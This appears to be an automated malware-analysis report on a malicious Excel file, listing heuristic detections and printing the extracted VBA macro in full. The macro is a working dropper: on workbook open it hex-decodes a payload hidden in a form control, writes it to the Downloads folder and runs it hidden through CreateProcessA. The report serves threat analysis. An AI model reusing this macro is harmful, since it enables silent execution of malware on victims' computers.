MALICIOUS
216
Risk Score
Heuristics 7
-
ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Embedded PE decoded from VBA/UserForm payload string critical OLE_VBA_EMBEDDED_PE_DROPPERThe VBA macro carries a Windows executable encoded as a base64 or hex string — split across macro string literals, or stored in a UserForm control's text (e.g. TextBox1.Text) — and rebuilds it at run time, typically writing it to %ProgramData%/%TEMP% (ADODB.Stream / binary Put) and executing it via WScript.Shell or cmd.exe. The payload is embedded in the document, not downloaded, and never appears as a contiguous executable on disk, so the URL recoverers and the raw embedded-EXE scan miss it. The analyzer decoded it into a valid PE (MZ + DOS stub + PE header); a benign document does not carry an executable in its macro/form strings. The dropped payload has been carved for full extracted-file analysis.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
userProfile = Environ("USERPROFILE") -
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4001 bytes |
SHA-256: 7aff7be05b483d522bc9ff57a3e19bafcb6e9b1cef5faa59af0fe62d9c65438b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 3, 0, MSForms, TextBox"
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare PtrSafe Function CreateADirect Lib "kernel32" Alias "CreateProcessA" ( _
ByVal lpApplicationName As String, _
ByVal lpCommandLine As String, _
ByVal lpProcessAttributes As LongPtr, _
ByVal lpThreadAttributes As LongPtr, _
ByVal bInheritHandles As Long, _
ByVal dwCreationFlags As Long, _
ByVal lpEnvironment As LongPtr, _
ByVal lpCurrentDirectory As String, _
ByRef lpStartupInfo As STARTUPINFOA, _
ByRef lpProcessInformation As PROCESS_INFORMATIONA) As Long
Private Declare PtrSafe Function CloseDirect Lib "kernel32" Alias "CloseHandle" ( _
ByVal hObject As LongPtr) As Long
Private Type STARTUPINFOA
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As LongPtr
hStdInput As LongPtr
hStdOutput As LongPtr
hStdError As LongPtr
End Type
Private Type PROCESS_INFORMATIONA
hProcess As LongPtr
hThread As LongPtr
dwProcessId As Long
dwThreadId As Long
End Type
Private Const CREATE_NO_WINDOW As Long = &H8000000
Sub REx(ByVal path As String)
Dim tsi As STARTUPINFOA
Dim tpi As PROCESS_INFORMATIONA
Dim ret As Long
tsi.cb = Len(tsi)
ret = CreateADirect(path, vbNullString, 0, 0, 0, CREATE_NO_WINDOW, 0, vbNullString, tsi, tpi)
If ret <> 0 Then
CloseDirect tpi.hProcess
CloseDirect tpi.hThread
' Else
' MsgBox "Failed to start process. Error: " & Err.LastDllError
End If
End Sub
Function Dechex(ByVal hstring As String) As Byte()
Dim length As Long
Dim i As Long
Dim result() As Byte
hstring = Replace(hstring, " ", "")
hstring = Replace(hstring, ":", "")
hstring = Replace(hstring, "-", "")
If Len(hstring) Mod 2 <> 0 Then
Err.Raise 5, "Dechex", "Hex string must have even length"
End If
length = Len(hstring) \ 2
ReDim result(0 To length - 1)
For i = 0 To length - 1
result(i) = Val("&H" & Mid(hstring, i * 2 + 1, 2))
Next i
Dechex = result
End Function
Private Sub Workbook_Open()
On Error GoTo ErrorHandler
Dim pathfile As String
Dim bytesapp() As Byte
Dim fileNum As Integer
userProfile = Environ("USERPROFILE")
pathfile = userProfile & "\Downloads\pic.LOG"
bytesapp = Dechex(UserForm1.box5.Text)
fileNum = FreeFile
Open pathfile For Binary Access Write As #fileNum
Put #fileNum, 1, bytesapp
Close #fileNum
REx pathfile
Exit Sub
ErrorHandler:
' MsgBox "Error in Document_Open: " & Err.Description
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{89A51452-A305-4E63-8C47-CECDA3AD38C5}{0CE53D50-CA94-4F47-BF62-A11B6A75EF01}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vba_embedded_payload.bin |
vba-embedded-pe | decoded from a hex/base64 payload string in a VBA UserForm control or macro literal | 223232 bytes |
SHA-256: 1b9e6fe4b03285b2e768c57e320d84323ac9167598395918d56a12e568b0009a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 shell/COM execution token(s). Carved artifact contains 2 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.